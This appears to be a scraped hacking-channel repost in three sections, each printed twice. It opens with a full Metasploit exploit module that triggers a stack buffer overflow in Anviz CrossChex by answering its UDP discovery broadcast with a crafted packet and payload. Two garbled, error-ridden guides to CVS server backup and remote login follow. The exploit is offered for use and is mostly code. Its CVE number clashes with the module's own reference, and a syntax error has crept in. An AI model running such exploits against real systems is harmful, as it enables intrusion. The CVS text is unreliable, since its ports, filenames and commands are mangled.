β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Anviz CrossChex - Buffer Overflow (Metasploit)
CVE-2020-2019 EXPLOITE β οΈ
Tested by UndercOde On Windows 10 :
twitter.com/UndercOdeTC
> This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##IP
π¦ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
π¦ Anviz CrossChex - Buffer Overflow (Metasploit)
CVE-2020-2019 EXPLOITE β οΈ
Tested by UndercOde On Windows 10 :
twitter.com/UndercOdeTC
> This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##IP
π¦ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ LINUX as the CVS server two
twitter.com/UndercOdeTC
1) backup and mobile software library of
backup software library files and other backup files is no different, but you need a backup tool to open this lock CVS, you must first register a user can read the software library. To open the CVS software library, you need to edit the `` # cvs.rfl 'file.
2) When you want to use a backed up soft library to restore the original library, if the original library has been changed after you backed up, CVS will report an error. You must Follow the steps below to
> get a new working directory
3) Copy the files that failed the last commit (of course, you can't copy the CVS directory files)
4) Work in the new directory, use cvs update or cvs diff and other commands to indicate those changes. Use cvs commit to save changes to the software library.
5) If you want to move a software library to another place, it is also very simple. The easiest way is to create a new directory to the directory to be moved. If you want to re- using the original directory, it can only manually modify the `` CVS / Repository '' and `` CVS / Root '', unless you're good at this, otherwise it is not recommended.
π¦ LINUX as the CVS server two
twitter.com/UndercOdeTC
1) backup and mobile software library of
backup software library files and other backup files is no different, but you need a backup tool to open this lock CVS, you must first register a user can read the software library. To open the CVS software library, you need to edit the `` # cvs.rfl 'file.
2) When you want to use a backed up soft library to restore the original library, if the original library has been changed after you backed up, CVS will report an error. You must Follow the steps below to
> get a new working directory
3) Copy the files that failed the last commit (of course, you can't copy the CVS directory files)
4) Work in the new directory, use cvs update or cvs diff and other commands to indicate those changes. Use cvs commit to save changes to the software library.
5) If you want to move a software library to another place, it is also very simple. The easiest way is to create a new directory to the directory to be moved. If you want to re- using the original directory, it can only manually modify the `` CVS / Repository '' and `` CVS / Root '', unless you're good at this, otherwise it is not recommended.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CVS remote user management by UndercOde :
instagram.com/UndercOdeTestingCompany
1) as a CVS server, you should Two points. First, ensure that the software library has enough space. Second, ensure that there is no less than 32M of memory. The server generates two processes for each user who connects to it.
2) The cost of the child process is small. But if the network bandwidth not enough, spending on the parent process is enormous.
3) Another big spending is diff file, when large source files, authenticates him or expenses detection is also great.
π¦ remote user login authentication method
> to rsh for routine remote login
1) Cvs server should use rsh to allow users to connect. Rshosts should be configured.
2) Assume that the user tom on the remote host tom.exsample.com needs to connect to the funame.simple.com cvs server to work. The server-side bach directory should be edited. Add
> Tom.exsample.com tom
> client to run rsh -l bach funame.simple.com 'echo @PATH
3) to make sure that you can connect to the CVS server, and the client should write the displayed path to .bashrc or cshrc (Instead of .logiin or .profile.)
4) In addition, the client can also define the environment variable CVS_SEVER. To define the location of the host. On the server side, modify the /etc/ineted.conf file to tell the server to get specific When the port is connected, run cvssever.
5) The default value of this port number is: 2041. Of course, in order not to be set every time you use it, you can use it by defining the environment variable CVS_AUTH_PORT on the
> client . Call, just add the following sentence in /etc/ineted.conf file to 2401 stream tcp nowait root / usr / local / bin / cvs cvs --f --allow --root = / cvsroot pserver
6) can also use the -T option to define the buffer directory.
βallow β root defines the software libraries available to users. If there are more software libraries on the server, this sentence needs to be reused. In addition, internal users can do this Define the environment variable CVSROOT
: pseve: usr@funam.simple.com: / cvsroot
7) Where usr is the username (for linux) funam.simple.com is the cvs server, and assumes / cvsroot is the directory name of the software library. The remote user can use the following form::
etx: psever: usr@funam.silple.com: / cvsroot
: etx: It is defined as a remote user, and the rest is the same as above.
8) If the client's ineted is used by general calls, only in / etc / seveice Add the following sentence:
cvspsever 2401 / tcp
restart ineted to read the initialization file.
9) CVS user management. In the default state (such as telnet login), the same user name and password as the Linux system That is: As long as you log in to the Linux system, you have read-only permissions for $ CVSROOT. Of course, for a software developer, you must have read-write permissions for the corresponding directory to complete the source code upgrade and other tasks. Therefore CVS also provides its own user authentication system to manage users more conveniently.
10) On the server side, there can be a passwd file under $ CVSROOT / CVSROOT (which can be defined with the environment variable CVS_PASSFILE.) To record cvs user information. He uses It is the same organization form as linux etc / passwd. Similarly, its passwold is also encrypted by linux standard. Here is the content of a passwd
anyone:
tom: xyzkue
mary: yuio: pubcvs
11) The first line means that when you log in as anyone, no password is required. Even if you type an empty string, of course, what you get in this way may be read-only rights. The second line means, Tom needs to enter passwold when logging in. The passworld is encrypted with xyzkue. After logging in in this way, generally higher permissions can be obtained
π¦CVS remote user management by UndercOde :
instagram.com/UndercOdeTestingCompany
1) as a CVS server, you should Two points. First, ensure that the software library has enough space. Second, ensure that there is no less than 32M of memory. The server generates two processes for each user who connects to it.
2) The cost of the child process is small. But if the network bandwidth not enough, spending on the parent process is enormous.
3) Another big spending is diff file, when large source files, authenticates him or expenses detection is also great.
π¦ remote user login authentication method
> to rsh for routine remote login
1) Cvs server should use rsh to allow users to connect. Rshosts should be configured.
2) Assume that the user tom on the remote host tom.exsample.com needs to connect to the funame.simple.com cvs server to work. The server-side bach directory should be edited. Add
> Tom.exsample.com tom
> client to run rsh -l bach funame.simple.com 'echo @PATH
3) to make sure that you can connect to the CVS server, and the client should write the displayed path to .bashrc or cshrc (Instead of .logiin or .profile.)
4) In addition, the client can also define the environment variable CVS_SEVER. To define the location of the host. On the server side, modify the /etc/ineted.conf file to tell the server to get specific When the port is connected, run cvssever.
5) The default value of this port number is: 2041. Of course, in order not to be set every time you use it, you can use it by defining the environment variable CVS_AUTH_PORT on the
> client . Call, just add the following sentence in /etc/ineted.conf file to 2401 stream tcp nowait root / usr / local / bin / cvs cvs --f --allow --root = / cvsroot pserver
6) can also use the -T option to define the buffer directory.
βallow β root defines the software libraries available to users. If there are more software libraries on the server, this sentence needs to be reused. In addition, internal users can do this Define the environment variable CVSROOT
: pseve: usr@funam.simple.com: / cvsroot
7) Where usr is the username (for linux) funam.simple.com is the cvs server, and assumes / cvsroot is the directory name of the software library. The remote user can use the following form::
etx: psever: usr@funam.silple.com: / cvsroot
: etx: It is defined as a remote user, and the rest is the same as above.
8) If the client's ineted is used by general calls, only in / etc / seveice Add the following sentence:
cvspsever 2401 / tcp
restart ineted to read the initialization file.
9) CVS user management. In the default state (such as telnet login), the same user name and password as the Linux system That is: As long as you log in to the Linux system, you have read-only permissions for $ CVSROOT. Of course, for a software developer, you must have read-write permissions for the corresponding directory to complete the source code upgrade and other tasks. Therefore CVS also provides its own user authentication system to manage users more conveniently.
10) On the server side, there can be a passwd file under $ CVSROOT / CVSROOT (which can be defined with the environment variable CVS_PASSFILE.) To record cvs user information. He uses It is the same organization form as linux etc / passwd. Similarly, its passwold is also encrypted by linux standard. Here is the content of a passwd
anyone:
tom: xyzkue
mary: yuio: pubcvs
11) The first line means that when you log in as anyone, no password is required. Even if you type an empty string, of course, what you get in this way may be read-only rights. The second line means, Tom needs to enter passwold when logging in. The passworld is encrypted with xyzkue. After logging in in this way, generally higher permissions can be obtained
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β